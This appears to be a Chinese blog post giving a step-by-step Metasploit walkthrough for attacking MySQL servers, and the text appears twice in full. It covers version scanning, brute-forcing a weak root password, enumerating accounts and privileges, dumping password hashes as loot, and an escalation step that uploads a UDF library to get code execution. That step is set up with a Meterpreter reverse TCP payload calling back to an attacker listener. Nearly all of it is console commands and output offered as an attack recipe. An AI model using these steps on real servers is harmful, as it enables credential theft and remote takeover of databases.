关闭

msf 值 mysql 利用

1099人阅读 评论(0) 收藏 举报
分类:


 1.确定版本
auxiliary/scanner/mysql/mysql_version    某些ip设置了指定的接入ip,可能没有接入权限

2.扫描弱口令
auxiliary/scanner/mysql/mysql_login
msf  auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_login) > set PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt
PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt
msf  auxiliary(mysql_login) > exploit

[+] 5.5.5.3:3306 - SUCCESSFUL LOGIN 'root' : '123456'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

查看结果:

msf  auxiliary(mysql_login) > creds
 
Credentials
===========
 
host     port  user  pass    type      active?
----     ----  ----  ----    ----      -------
5.5.5.3  3306  root  123456  password  true
 
[*] Found 1 credential.


3.查看数据库信息(需要有用户名和口令)
auxiliary/admin/mysql/mysql_enum
msf  auxiliary(mysql_enum) > show options

msf  auxiliary(mysql_enum) > set PASSWORD 123456
msf  auxiliary(mysql_enum) > set USERNAME root
msf  auxiliary(mysql_enum) > exploit
 
[*] Running MySQL Enumerator...
[*] Enumerating Parameters
[*]     MySQL Version: 5.5.16
[*]     Compiled for the following OS: Win32
[*]     Architecture: x86
[*]     Server Hostname: dis9team-a1
[*]     Data Directory: C:\xampp\mysql\data\
[*]     Logging of queries and logins: OFF
[*]     Old Password Hashing Algorithm OFF
[*]     Loading of local files: ON
[*]     Logins with old Pre-4.1 Passwords: OFF
[*]     Allow Use of symlinks for Database Files: YES
[*]     Allow Table Merge:
[*]     SSL Connection: DISABLED
[*] Enumerating Accounts:
[*]     List of Accounts with Password Hashes:
[*]         User: root Host: localhost Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*]         User: root Host: 127.0.0.1 Password Hash:
[*]         User:  Host: localhost Password Hash:
[*]         User: pma Host: localhost Password Hash:
[*]         User: root Host: % Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*]     The following users have GRANT Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have CREATE USER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have RELOAD Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have SHUTDOWN Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have SUPER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have FILE Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have PROCESS Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following accounts have privileges to the mysql database:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     Anonymous Accounts are Present:
[*]         User:  Host: localhost
[*]     The following accounts have empty passwords:
[*]         User: root Host: 127.0.0.1
[*]         User:  Host: localhost
[*]         User: pma Host: localhost
[*]     The following accounts are not restricted by source:
[*]         User: root Host: %
[*] Auxiliary module execution completed
msf  auxiliary(mysql_enum) >


4.执行语句
msf  auxiliary(mysql_enum) > use auxiliary/admin/mysql/mysql_sql
msf  auxiliary(mysql_sql) > show options
 
Module options (auxiliary/admin/mysql/mysql_sql):
 
msf  auxiliary(mysql_sql) > set PASSWORD 123456
PASSWORD => 123456
msf  auxiliary(mysql_sql) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  auxiliary(mysql_sql) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_sql) > exploit
 
[*] Sending statement: 'select version()'...
[*]  | 5.5.16 |
[*] Auxiliary module execution completed
msf  auxiliary(mysql_sql) >

5.导出HASH
msf  auxiliary(mysql_sql) > use auxiliary/scanner/mysql/mysql_hashdump
msf  auxiliary(mysql_hashdump) > show options
 
Module options (auxiliary/scanner/mysql/mysql_hashdump):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     3306             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME                   no        The username to authenticate as
 
msf  auxiliary(mysql_hashdump) > set PASSWORD 123456
PASSWORD => 123456
smsf  auxiliary(mysql_hashdump) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_hashdump) > set RHOSTS 5.5.5.3
RHOSTS => 5.5.5.3
msf  auxiliary(mysql_hashdump) > exploit
 
[+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] Saving HashString as Loot: root:
[+] Saving HashString as Loot: :
[+] Saving HashString as Loot: pma:
[+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] Saving HashString as Loot: dis9team:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*] Hash Table has been saved: /home/brk/.msf4/loot/20120312075809_default_5.5.5.3_mysql.hashes_864135.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(mysql_hashdump) >


7.权限提升
msf  auxiliary(mysql_login) > use exploit/windows/mysql/mysql_payload
msf  exploit(mysql_payload) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  exploit(mysql_payload) > show options
 
Module options (exploit/windows/mysql/mysql_payload):
 
   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   FORCE_UDF_UPLOAD  false            no        Always attempt to install a sys_exec() mysql.function.
   PASSWORD                           no        The password for the specified username
   RHOST             5.5.5.3          yes       The target address
   RPORT             3306             yes       The target port
   USERNAME          root             no        The username to authenticate as
 
Payload options (windows/meterpreter/reverse_tcp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     5.5.5.1          yes       The listen address
   LPORT     4444             yes       The listen port
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic
 
msf  exploit(mysql_payload) > set PASSWORD 123456
PASSWORD => 123456
msf  exploit(mysql_payload) > exploit
[*] Started reverse handler on 5.5.5.1:4444
[*] Checking target architecture...
[*] Checking for sys_exec()...
[*] Checking target architecture...
[*] Checking for MySQL plugin directory...
[*] Target arch (win32) and target path both okay.
[*] Uploading lib_mysqludf_sys_32.dll library to C:/xampp/mysql/lib/plugin/CHlQoqQu.dll...
[*] Checking for sys_exec()...
[*] Command Stager progress -  10.26% done (10493/102246 bytes)
[*] Command Stager progress -  30.79% done (31479/102246 bytes)
[*] Command Stager progress -  80.63% done (82445/102246 bytes)
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
msf  exploit(mysql_payload) > sessions
 
Active sessions
===============
 
No active sessions.
 
msf  exploit(mysql_payload) >


ySQL password hashdump (mysql_hashdump)
如下命令可调用这个模块:
msf > use auxiliary/scanner/mysql/mysql_hashdump
RHOST:目标IP(可以是单个IP,也可以是一个网段192.168.1.0-192.168.1.255 or 192.168.1.0/24,当然文件形式也可以file:/tmp/ip_addresses.txt)
THREADS:线程数
USERNAME:用户名
PASSWORD:密码
 
MySQL enumeration (mysql_enum)
如下命令可调用这个模块:
msf > use auxiliary/admin/mysql/mysql_enum
这个模块可以读取mysql服务器的相关信息,如
•     The MySQL version
•     The MySQL OS compilation target
•     The server architecture
•     The server hostname
•     The MySQL datas directory location
•     If logging of queries and logins is activated or not, and log files location
•     If the old password hashing algorithm support is activated or not
•     If local files loading (infile) is activated or not
•     If logins with old Pre-4.1 passwords is authorized or not
 
MySQL Authbypass(mysql_authbypass_hashdump)
如下命令可调用这个模块:
  
msf > use auxiliary/admin/mysql/mysql_authbypass_hashdump


 1.确定版本
auxiliary/scanner/mysql/mysql_version    某些ip设置了指定的接入ip,可能没有接入权限

2.扫描弱口令
auxiliary/scanner/mysql/mysql_login
msf  auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_login) > set PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt
PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt
msf  auxiliary(mysql_login) > exploit

[+] 5.5.5.3:3306 - SUCCESSFUL LOGIN 'root' : '123456'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

查看结果:

msf  auxiliary(mysql_login) > creds
 
Credentials
===========
 
host     port  user  pass    type      active?
----     ----  ----  ----    ----      -------
5.5.5.3  3306  root  123456  password  true
 
[*] Found 1 credential.


3.查看数据库信息(需要有用户名和口令)
auxiliary/admin/mysql/mysql_enum
msf  auxiliary(mysql_enum) > show options

msf  auxiliary(mysql_enum) > set PASSWORD 123456
msf  auxiliary(mysql_enum) > set USERNAME root
msf  auxiliary(mysql_enum) > exploit
 
[*] Running MySQL Enumerator...
[*] Enumerating Parameters
[*]     MySQL Version: 5.5.16
[*]     Compiled for the following OS: Win32
[*]     Architecture: x86
[*]     Server Hostname: dis9team-a1
[*]     Data Directory: C:\xampp\mysql\data\
[*]     Logging of queries and logins: OFF
[*]     Old Password Hashing Algorithm OFF
[*]     Loading of local files: ON
[*]     Logins with old Pre-4.1 Passwords: OFF
[*]     Allow Use of symlinks for Database Files: YES
[*]     Allow Table Merge:
[*]     SSL Connection: DISABLED
[*] Enumerating Accounts:
[*]     List of Accounts with Password Hashes:
[*]         User: root Host: localhost Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*]         User: root Host: 127.0.0.1 Password Hash:
[*]         User:  Host: localhost Password Hash:
[*]         User: pma Host: localhost Password Hash:
[*]         User: root Host: % Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*]     The following users have GRANT Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have CREATE USER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have RELOAD Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have SHUTDOWN Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have SUPER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have FILE Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have PROCESS Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following accounts have privileges to the mysql database:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     Anonymous Accounts are Present:
[*]         User:  Host: localhost
[*]     The following accounts have empty passwords:
[*]         User: root Host: 127.0.0.1
[*]         User:  Host: localhost
[*]         User: pma Host: localhost
[*]     The following accounts are not restricted by source:
[*]         User: root Host: %
[*] Auxiliary module execution completed
msf  auxiliary(mysql_enum) >


4.执行语句
msf  auxiliary(mysql_enum) > use auxiliary/admin/mysql/mysql_sql
msf  auxiliary(mysql_sql) > show options
 
Module options (auxiliary/admin/mysql/mysql_sql):
 
msf  auxiliary(mysql_sql) > set PASSWORD 123456
PASSWORD => 123456
msf  auxiliary(mysql_sql) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  auxiliary(mysql_sql) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_sql) > exploit
 
[*] Sending statement: 'select version()'...
[*]  | 5.5.16 |
[*] Auxiliary module execution completed
msf  auxiliary(mysql_sql) >

5.导出HASH
msf  auxiliary(mysql_sql) > use auxiliary/scanner/mysql/mysql_hashdump
msf  auxiliary(mysql_hashdump) > show options
 
Module options (auxiliary/scanner/mysql/mysql_hashdump):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     3306             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME                   no        The username to authenticate as
 
msf  auxiliary(mysql_hashdump) > set PASSWORD 123456
PASSWORD => 123456
smsf  auxiliary(mysql_hashdump) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_hashdump) > set RHOSTS 5.5.5.3
RHOSTS => 5.5.5.3
msf  auxiliary(mysql_hashdump) > exploit
 
[+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] Saving HashString as Loot: root:
[+] Saving HashString as Loot: :
[+] Saving HashString as Loot: pma:
[+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] Saving HashString as Loot: dis9team:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*] Hash Table has been saved: /home/brk/.msf4/loot/20120312075809_default_5.5.5.3_mysql.hashes_864135.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(mysql_hashdump) >


7.权限提升
msf  auxiliary(mysql_login) > use exploit/windows/mysql/mysql_payload
msf  exploit(mysql_payload) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  exploit(mysql_payload) > show options
 
Module options (exploit/windows/mysql/mysql_payload):
 
   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   FORCE_UDF_UPLOAD  false            no        Always attempt to install a sys_exec() mysql.function.
   PASSWORD                           no        The password for the specified username
   RHOST             5.5.5.3          yes       The target address
   RPORT             3306             yes       The target port
   USERNAME          root             no        The username to authenticate as
 
Payload options (windows/meterpreter/reverse_tcp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     5.5.5.1          yes       The listen address
   LPORT     4444             yes       The listen port
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic
 
msf  exploit(mysql_payload) > set PASSWORD 123456
PASSWORD => 123456
msf  exploit(mysql_payload) > exploit
[*] Started reverse handler on 5.5.5.1:4444
[*] Checking target architecture...
[*] Checking for sys_exec()...
[*] Checking target architecture...
[*] Checking for MySQL plugin directory...
[*] Target arch (win32) and target path both okay.
[*] Uploading lib_mysqludf_sys_32.dll library to C:/xampp/mysql/lib/plugin/CHlQoqQu.dll...
[*] Checking for sys_exec()...
[*] Command Stager progress -  10.26% done (10493/102246 bytes)
[*] Command Stager progress -  30.79% done (31479/102246 bytes)
[*] Command Stager progress -  80.63% done (82445/102246 bytes)
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
msf  exploit(mysql_payload) > sessions
 
Active sessions
===============
 
No active sessions.
 
msf  exploit(mysql_payload) >


ySQL password hashdump (mysql_hashdump)
如下命令可调用这个模块:
msf > use auxiliary/scanner/mysql/mysql_hashdump
RHOST:目标IP(可以是单个IP,也可以是一个网段192.168.1.0-192.168.1.255 or 192.168.1.0/24,当然文件形式也可以file:/tmp/ip_addresses.txt)
THREADS:线程数
USERNAME:用户名
PASSWORD:密码
 
MySQL enumeration (mysql_enum)
如下命令可调用这个模块:
msf > use auxiliary/admin/mysql/mysql_enum
这个模块可以读取mysql服务器的相关信息,如
•     The MySQL version
•     The MySQL OS compilation target
•     The server architecture
•     The server hostname
•     The MySQL datas directory location
•     If logging of queries and logins is activated or not, and log files location
•     If the old password hashing algorithm support is activated or not
•     If local files loading (infile) is activated or not
•     If logins with old Pre-4.1 passwords is authorized or not
 
MySQL Authbypass(mysql_authbypass_hashdump)
如下命令可调用这个模块:
  
msf > use auxiliary/admin/mysql/mysql_authbypass_hashdump

0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:89569次
    • 积分:1431
    • 等级:
    • 排名:千里之外
    • 原创:52篇
    • 转载:19篇
    • 译文:1篇
    • 评论:8条
    最新评论